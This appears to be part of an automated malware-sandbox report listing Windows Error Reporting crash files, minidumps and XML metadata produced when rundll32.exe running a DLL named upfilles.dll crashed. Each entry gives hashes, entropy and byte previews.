                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):0.7695284270582192
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:DgFPd/ifyKyOsj+4RvNxrfNrQXIDcQOc6ncECcw3l+XaXz+HbHgSQgJjZh88Wpo3:s11ifyOA80wjIx8jbyzuiFeZ24lO83D
                                                                                                                MD5:2A79D4F0CC409452333A8DDF84450AEF
                                                                                                                SHA1:512CBEAAAC2972AE331C435F33652DABEA99A541
                                                                                                                SHA-256:3B527751CA5679B2B05D430B17ADDE2A98AFCC30216D6AA11E58AFF116A824B0
                                                                                                                SHA-512:9B02987593193A773237874A8B64ED4910787AF41B8B8ABCCC5DBA27DF4A1CFE6DC316B2342075BCB51ADB9B0D7033C8AEE7CBCC8867DFD0860E46D5A3FFF0A6
                                                                                                                Malicious:false
                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.5.2.8.4.4.3.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.5.5.9.6.9.2.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.b.8.9.3.4.c.-.4.3.7.b.-.4.5.0.d.-.a.f.4.6.-.0.1.8.5.9.6.2.b.2.4.b.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.a.7.5.8.8.6.c.-.1.e.1.4.-.4.9.7.7.-.a.4.1.a.-.1.2.a.6.4.d.0.0.c.9.b.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.u.p.f.i.l.l.e.s...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.7.4.-.0.0.0.1.-.0.0.1.4.-.9.1.1.3.-.3.8.f.9.2.5.a.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_upf_dc8a9dd96bb43aa654aa29aa9f464ac6a31131f_9db0ef65_7dc7f057-dc81-4d91-9caa-bd8701d223a3\Report.wer

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):0.7695293488830603
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:CcxgFF3/iOyKyZsj+4RvNxrfKQXIDcQOc6ncETcw3CCXaXz+HbHgSQgJjZh88Wp8:FgviOyZK0wjpFjbyzuiFeZ24lO83
                                                                                                                MD5:02C2AE579A388FFA4C5C6A5104F49832
                                                                                                                SHA1:0C660AE3539AE95EDF65C53088E9DA7EB5DFFEC9
                                                                                                                SHA-256:C313D051688A264AD7778F15CEC6ECB0D2FA908EA92D9134E25ED80B3B43C826
                                                                                                                SHA-512:A0A17281B979ACB45169A5C79673EC67EEC58F73B21E9D325CE34BD1630D7DBF459BF7AA4DCCE803D8D4842130BCD62AEE4F3822E8A75FA2770905BD285D0830
                                                                                                                Malicious:false
                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.8.5.5.9.7.4.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.8.9.9.7.2.4.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.d.c.7.f.0.5.7.-.d.c.8.1.-.4.d.9.1.-.9.c.a.a.-.b.d.8.7.0.1.d.2.2.3.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.b.5.f.a.4.a.6.-.8.4.c.8.-.4.1.2.c.-.b.8.1.1.-.e.9.d.8.7.2.5.2.d.c.7.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.u.p.f.i.l.l.e.s...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.6.8.-.0.0.0.1.-.0.0.1.4.-.0.4.1.7.-.0.6.f.b.2.5.a.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_upf_dc8a9dd96bb43aa654aa29aa9f464ac6a31131f_9db0ef65_8641b0ad-46f6-452c-a496-10d58d4ec871\Report.wer

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):0.7695999953173611
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:TEF1ks0/idyKygsj+4RvNxrfKQXIDcQOc6ncETcw3CCXaXz+HbHgSQgJjZh88Wp8:o3CidygK0wjpFjbyzuiFeZ24lO83
                                                                                                                MD5:F9DA4317B3745718F8A31BB61F06A4F4
                                                                                                                SHA1:9BD89B72FF6CD9493B7343C4A720B403B54D0439
                                                                                                                SHA-256:072151E64254174294A716437E4F986EC8336BAC545EBEA5D71EC5A481A00DBD
                                                                                                                SHA-512:D2E3D37FAB0EB27FDEAA9A17C253B5D225EA96CD53D898A9F7A8A829D2D6B887E0139387DF6CDA03D85A7E2E8595025E08032A65822C12B65E124144B35837AC
                                                                                                                Malicious:false
                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.2.3.7.7.9.6.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.2.7.3.7.3.4.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.4.1.b.0.a.d.-.4.6.f.6.-.4.5.2.c.-.a.4.9.6.-.1.0.d.5.8.d.4.e.c.8.7.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.a.0.2.e.b.5.a.-.0.8.a.0.-.4.c.3.1.-.b.1.3.9.-.4.4.8.1.7.4.2.9.8.e.a.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.u.p.f.i.l.l.e.s...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.b.4.-.0.0.0.1.-.0.0.1.4.-.0.d.f.7.-.6.b.f.7.2.5.a.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D40.tmp.dmp

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 14 streams, Fri May 10 22:04:02 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):66070
                                                                                                                Entropy (8bit):1.5462375465383378
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:5u8hjNE3e2neSVUa52sl4GbfhHoi7M9UUACGcKutR1ZfE0FXtpqgJbqStCSqjWIF:XhjNi2OM+UAtq1ZfNTqgwStCS9ngz
                                                                                                                MD5:677694119DA44E5FEC7BF1C1317E830B
                                                                                                                SHA1:4FEB41E3E2792D4305F3FD66F5EE17E8BFFDA32D
                                                                                                                SHA-256:13C9DE6CF736408ECF3F5D8B186442A3381B005B307FDBD5DCEB114A627866FB
                                                                                                                SHA-512:000B790E53523A6DFE23A290EFD228BFF0E399927D925B880663ED99F0F3E07957C357E346C4976419B62BC34EC43367BE19E3CA39663B65BD3A6E16CDCE2824
                                                                                                                Malicious:false
                                                                                                                Preview:MDMP..a..... ........>f....................................$...............T.......8...........T.......................................p...............................................................................eJ..............Lw......................T............>f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DFD.tmp.WERInternalMetadata.xml

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8534
                                                                                                                Entropy (8bit):3.6939797702013397
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:R6l7wVeJqdgkmE6Yo8N4LgmfWP3pry89bU66Wf088m:R6lXJqakmE6YLegmfWPRU6DfR
                                                                                                                MD5:80B9B0AFA9ABA69B9A78557C448086C5
                                                                                                                SHA1:B99101A8A598F674B85334D5F8A0609AC22631E6
                                                                                                                SHA-256:9968C12422E570B5EE4916B7EDF4BC0240E72DE23F62EF10630EC4B1E51814FF
                                                                                                                SHA-512:8D2CBE94CDDBA9C7F4FDD42B91E690533542BB23B8DD38FD258D3CC44585D6C07E12DA68A06CC179B1B8C7D8C3A8F400316A4787D58FB980DD530F34F2BAB469
                                                                                                                Malicious:false
                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.2.4.<./.P.i.

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E1D.tmp.xml

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4777
                                                                                                                Entropy (8bit):4.477202967569579
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zssJg771I99aWpW8VY+Ym8M4JCNCF0laFtyq85mQCy8ptSTSLd:uIjfqI7+b7VeJilCGT8poOLd
                                                                                                                MD5:5D367A225C41966DC6550185A90DAE6F
                                                                                                                SHA1:101CC4DF6477453EA9552B5AD0EE1273F1599AEA
                                                                                                                SHA-256:E6997AC198F3DBE27F9915E0C4A3CC5E65654C6536885480C9BC6EF40290C190
                                                                                                                SHA-512:EDF7487656C3685EFE40BEAB794203DDBF95DD49E14CA56E27EAC8BD88B5CCE0BFF9C5555D329990288C05738F40CF731B5EE9D15DB3800A90DCA5F80C5D46F8
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER389A.tmp.dmp

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 14 streams, Fri May 10 22:04:05 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):58190
                                                                                                                Entropy (8bit):1.605256614606473
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:0VrYrCpCzQOMAsu+Qiqwxay+QsK0QRAQh:2E1TpoQi1aZQsK/Rp
                                                                                                                MD5:CAAA37C00D8ECF6FA5FC4FA2A30BD2FA
                                                                                                                SHA1:2F9D061ED037ECE51B72AC937A99813073410435
                                                                                                                SHA-256:ECA00EFCB890B105FA3A548999F1E7A161FD7BDB5ED7B1F2FF2240DF570C41E2
                                                                                                                SHA-512:9432BA4BCEB6E8A6D56DB1CBD256C7A1C3835413B22B4CEC7A7D8D7FACC8A85CF7E981CDC802E9A7001EB67285401042ED97471A5617B1D8BC220A145DD928C2
                                                                                                                Malicious:false
                                                                                                                Preview:MDMP..a..... ........>f.........................................)..........T.......8...........T...............V...........T...........@...............................................................................eJ..............Lw......................T.......t....>f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER38DA.tmp.WERInternalMetadata.xml

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8534
                                                                                                                Entropy (8bit):3.6966319113948383
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:R6l7wVeJRBAmS6YojN4LgmfWfiwsprRC89br4Wf9vZm:R6lXJXAmS6YEegmfWqP7rxfi
                                                                                                                MD5:B607A2EB5584FD30993D12ABB2C4DF8A
                                                                                                                SHA1:F2E1E2CE69FB5F3AB9850FF3A56668B6DFAE0AFF
                                                                                                                SHA-256:DC1BDEED634E5907DFD137282558057ED000A00CD7BABC1ABC665D6B47410064
                                                                                                                SHA-512:249030B4D7B167C51DA04101F483BFE2D977EDE4D0DBAF6E45720002D56785033391999DCBE0591289B8DE51E15D1C1ADBCE641A4472471D0A4B869CED69DDAD
                                                                                                                Malicious:false
                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.1.6.<./.P.i.

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3919.tmp.xml

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4777
                                                                                                                Entropy (8bit):4.480227848947886
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zssJg771I99aWpW8VYsYm8M4JCNCF0saFmjyq85mQCrAptSTSDd:uIjfqI7+b7VEJi8jGfpoODd
                                                                                                                MD5:76611ED68AE98A3C1C5418DA42AD9839
                                                                                                                SHA1:E56614DC31056975565348CCA2BC464DC61B1657
                                                                                                                SHA-256:1E7C757B8CED61BB0960A6FD8EE447BE3D82DF516B6DBF0CD4E9DD3CD465F897
                                                                                                                SHA-512:1852341A694CC87F021633950EA49ECE0FDC5D470769097BE801C9F5F525F77E075FF0F4FC9BAE3266E303161AB520D0DEFF756C4B6DF3F6CF50F20AD73A052C
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER459B.tmp.dmp

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 14 streams, Fri May 10 22:04:08 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):57494
                                                                                                                Entropy (8bit):1.6234250646337964
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:duYrC6W3OMlUsn9pHz+bF7frc/wHGpzp/iaBReJd5U6:rhZgV9lxXpzp/9jePL
                                                                                                                MD5:66F2A3C376DA0D558312FF6110D838C3
                                                                                                                SHA1:834B317025A81AA5E7F00DF4430D56F7D760645B
                                                                                                                SHA-256:562F917C37C8D1E62F2E934483DEF3B9032D3EDBDE40154FD19E1CEA1BE2BAF2
                                                                                                                SHA-512:58CC96682B33937C6CBB1E4CA8C0F7A07A37CD327DF704A9149CEAD1272E8F4C2539691B2C8FA46B75BB017353F11C02BD129EFE4159EE3081DF67D534CB974C
                                                                                                                Malicious:false
                                                                                                                Preview:MDMP..a..... ........>f.........................................)..........T.......8...........T...........................T...........@...............................................................................eJ..............Lw......................T.......h....>f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4619.tmp.WERInternalMetadata.xml

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8522
                                                                                                                Entropy (8bit):3.6962697567258553
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:R6l7wVeJtabmV6Y7pGgmfWP3prM89b+rWfxKm:R6lXJwbmV6YFGgmfWPT+6fd
                                                                                                                MD5:B71FE5E91F46A2F6E80793B28555315E
                                                                                                                SHA1:52F0EE991F743BEA0995768C5AA075635A979098
                                                                                                                SHA-256:7F8F6E795A696CA77E094A9664C2A6B795FFB3C2E9A5A6AEF1ED303C408F7EA0
                                                                                                                SHA-512:5CE960EE43F0BD8BEE75A7688B62FD8BD51F4CE59AF84251C28867D7FD5E54FF5E03D2D159A5C36D8B04415FB04CF4EA130D1036D1D8DC564B5B2F961FFE0203
                                                                                                                Malicious:false
                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.7.2.<./.P.i.

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4648.tmp.xml

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4777
                                                                                                                Entropy (8bit):4.478653683433715
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zssJg771I99aWpW8VYpYm8M4JCNCF0laFniyq85mQCypptSTS6d:uIjfqI7+b7V1JilVGTppoO6d
                                                                                                                MD5:DA7D9A451274291EFD3755DC8FC3A141
                                                                                                                SHA1:51E42DA26BBC94435F94EFDBDF8A242CC744E57C
                                                                                                                SHA-256:821799E5797BB8E3BCB45C123C170C09004DB0C21BB4FC46A6F6A99DE66FFC12
                                                                                                                SHA-512:1AADD5F0D59B95756B48DFE2F6F95D358774409C5E209449411050C86A5F3990AE52D7AA1BBDD93063D712B6CB0DC84BE371833813004423128DF6949663B53A
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="317586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4656.tmp.dmp

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 14 streams, Fri May 10 22:04:08 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):54894
                                                                                                                Entropy (8bit):1.6839237359198767
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:59S8veE3+XuQRawUKUCGsV3bBvgoi7MxpnZ0mK1NX7RT9bCmYhJbqmpx5OqWRW/F:diYrCrOMzuJXeDwwx5OLIH9EyXh
                                                                                                                MD5:A837E0375D7983509A56860346CFCC15
                                                                                                                SHA1:F75FAE2A056C6FEF8D8F1D700F3412213DFFFB2D
                                                                                                                SHA-256:205CD9270682DC17A83E8D40610371F3ED964DD319E67BDBA4BE1780DF36D02F
                                                                                                                SHA-512:DAD398EB6A465DF561E9F4A51FD2D414C84CFFB7F34BC06FEE2515B88EDCAC48978359ADA324F8A441AE9304221089DF081651A0CC5B770D121A04ED586B5A4A
                                                                                                                Malicious:false
                                                                                                                Preview:MDMP..a..... ........>f.........................................)..........T.......8...........T...............v...........T...........@...............................................................................eJ..............Lw......................T.......x....>f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

